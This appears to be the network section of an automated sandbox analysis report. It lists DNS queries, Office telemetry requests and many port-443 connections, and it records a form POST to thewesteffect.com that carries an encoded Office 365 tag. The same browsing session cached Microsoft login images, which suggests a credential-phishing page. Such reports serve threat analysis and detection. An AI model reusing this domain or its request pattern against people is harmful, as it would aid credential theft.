          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficDNS traffic detected: DNS query: thewesteffect.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: unknownHTTP traffic detected: POST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N HTTP/1.1Host: thewesteffect.comConnection: keep-aliveContent-Length: 139036Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://thewesteffect.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: chromecache_65.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_55.1.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://google.com
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_65.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: chromecache_62.1.dr, chromecache_65.1.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 57382 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 57330 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57368
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57347 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57369
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57375
          Source: unknownNetwork traffic detected: HTTP traffic on port 57404 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57376
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57377
          Source: unknownNetwork traffic detected: HTTP traffic on port 57318 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57378
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57371
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57372
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57373
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57374
          Source: unknownNetwork traffic detected: HTTP traffic on port 57427 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57370
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57438 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57312 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57364 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57421 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57329 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57379
          Source: unknownNetwork traffic detected: HTTP traffic on port 57370 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57386
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57387
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57388
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57389
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57382
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57383
          Source: unknownNetwork traffic detected: HTTP traffic on port 57301 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57384
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57385
          Source: unknownNetwork traffic detected: HTTP traffic on port 57399 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57410 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57380
          Source: unknownNetwork traffic detected: HTTP traffic on port 57336 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57353 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57381
          Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57439 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57422 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57365 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57397
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57398
          Source: unknownNetwork traffic detected: HTTP traffic on port 57371 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57399
          Source: unknownNetwork traffic detected: HTTP traffic on port 57342 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57393
          Source: unknownNetwork traffic detected: HTTP traffic on port 57323 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57394
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57395
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57396
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57390
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57391
          Source: unknownNetwork traffic detected: HTTP traffic on port 57398 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57392
          Source: unknownNetwork traffic detected: HTTP traffic on port 57306 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57331 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57387 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57348 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57405 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57317 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57450 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57433 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57359 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57376 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57393 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57305 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57437 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57414 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57311 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57443 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57449
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57329
          Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57324
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57445
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57325
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57446
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57326
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57447
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57327
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57448
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57331
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57452
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57332
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57453
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57333
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57454
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57334
          Source: unknownNetwork traffic detected: HTTP traffic on port 57408 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57450
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57330
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57451
          Source: unknownNetwork traffic detected: HTTP traffic on port 57337 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57354 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57377 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57360 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57339
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57335
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57336
          Source: unknownNetwork traffic detected: HTTP traffic on port 57389 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57337
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57338
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57342
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57343
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57344
          Source: unknownNetwork traffic detected: HTTP traffic on port 57343 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57345
          Source: unknownNetwork traffic detected: HTTP traffic on port 57403 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57449 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57431 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57340
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57341
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 57395 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57332 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 57388 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57361 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57346
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57347
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57348
          Source: unknownNetwork traffic detected: HTTP traffic on port 57349 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57349
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57353
          Source: unknownNetwork traffic detected: HTTP traffic on port 57394 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57354
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57355
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57356
          Source: unknownNetwork traffic detected: HTTP traffic on port 57316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57350
          Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57448 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57351
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57352
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 57415 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 57310 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57409 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57327 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57357
          Source: unknownNetwork traffic detected: HTTP traffic on port 57366 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57358
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57359
          Source: unknownNetwork traffic detected: HTTP traffic on port 57383 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57364
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57365
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57366
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57367
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57360
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57361
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57362
          Source: unknownNetwork traffic detected: HTTP traffic on port 57454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57363
          Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57338 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 57355 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 57309 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57409
          Source: unknownNetwork traffic detected: HTTP traffic on port 57418 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57405
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57406
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57407
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57408
          Source: unknownNetwork traffic detected: HTTP traffic on port 57401 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57401
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57402
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57403
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57367 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57404
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57321 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57453 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57410
          Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57344 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57411
          Source: unknownNetwork traffic detected: HTTP traffic on port 57350 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57373 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57396 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57333 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57413 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57442 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57304 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57416
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57417
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57418
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57419
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57412
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57413
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57414
          Source: unknownNetwork traffic detected: HTTP traffic on port 57385 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57415
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57420
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57421
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57301
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57422
          Source: unknownNetwork traffic detected: HTTP traffic on port 57407 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57424 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57315 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57378 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57391 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57441 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57303 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57306
          Source: unknownNetwork traffic detected: HTTP traffic on port 57326 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57427
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57307
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57428
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57308
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57429
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57309
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57302
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57423
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57303
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57424
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57304
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57425
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57305
          Source: unknownNetwork traffic detected: HTTP traffic on port 57384 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57426
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57430
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57310
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57431
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57311
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57432
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57312
          Source: unknownNetwork traffic detected: HTTP traffic on port 57402 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57433
          Source: unknownNetwork traffic detected: HTTP traffic on port 57425 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57339 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57379 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57390 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57356 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57419 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57436 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57317
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57438
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57318
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57439
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57319
          Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57313
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57434
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57314
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57435
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57315
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57436
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57316
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57437
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57320
          Source: unknownNetwork traffic detected: HTTP traffic on port 57345 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57441
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57321
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57442
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57322
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57323
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57444
          Source: unknownNetwork traffic detected: HTTP traffic on port 57320 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57440
          Source: unknownNetwork traffic detected: HTTP traffic on port 57351 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57447 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57357 -> 443
